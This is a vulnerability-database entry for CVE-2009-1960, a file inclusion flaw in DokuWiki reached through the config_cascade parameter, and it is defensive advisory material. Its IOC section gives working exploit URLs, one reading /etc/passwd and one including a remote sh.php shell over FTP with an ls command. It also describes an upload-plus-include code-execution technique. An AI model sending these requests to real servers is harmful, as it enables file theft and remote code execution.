cbcvebase.
CVE-2009-1960
published 2009-06-08

CVE-2009-1960: inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary…

PriorityP260critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
23.16%
97.5th percentile
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.

Affected

8 ranges
VendorProductVersion rangeFixed in
debiandokuwiki< dokuwiki 0.0.20090214b-1 (bookworm)dokuwiki 0.0.20090214b-1 (bookworm)
dokuwikidokuwiki
dokuwikidokuwiki
dokuwikidokuwiki
dokuwikidokuwiki>= 0 < 0.0.20090214b-10.0.20090214b-1
dokuwikidokuwiki>= 0 < 0.0.20090214b-10.0.20090214b-1
dokuwikidokuwiki>= 0 < 0.0.20090214b-10.0.20090214b-1
dokuwikidokuwiki>= 0 < 0.0.20090214b-10.0.20090214b-1

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://[host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
urlhttp://[host]/[path]/doku.php?config_cascade[main][default][]=./README
urlhttp://[host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt
urlhttp://[host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc
urlhttp://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:[email protected]/folder/sh.php&cmd=ls%20-la>out.txt
path/inc/init.php
  • Detect HTTP requests to doku.php containing the parameter 'config_cascade[main][default][]' in the query string, which is the direct exploitation vector for this LFI/RFI vulnerability.
  • Alert on requests to doku.php where 'config_cascade[main][default][]' is set to path traversal strings (e.g., /etc/passwd, ./data/pages/*.txt, ./data/media/*.doc) indicating local file inclusion attempts.
  • Alert on requests to doku.php where 'config_cascade[main][default][]' is set to an ftp:// URL, indicating PHP 5 remote file inclusion via FTP wrapper.
  • Detect POST requests to doku.php that combine a multipart file upload body with a 'config_cascade[main][default][]' query parameter pointing to a PHP temporary file path, indicating the combined upload+include RCE technique.
  • ·The vulnerability is only exploitable when PHP's register_globals directive is enabled (non-default in modern PHP). Installations with register_globals = Off are not affected.
  • ·The FTP-wrapper remote file inclusion variant additionally requires allow_url_fopen = On (PHP default) AND allow_url_include = On (NOT the PHP default), limiting its exploitability.
  • ·The temporary file inclusion trick requires file_uploads = On (PHP default), meaning it is broadly applicable on default PHP configurations as long as register_globals is also on.

CVSS provenance

nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.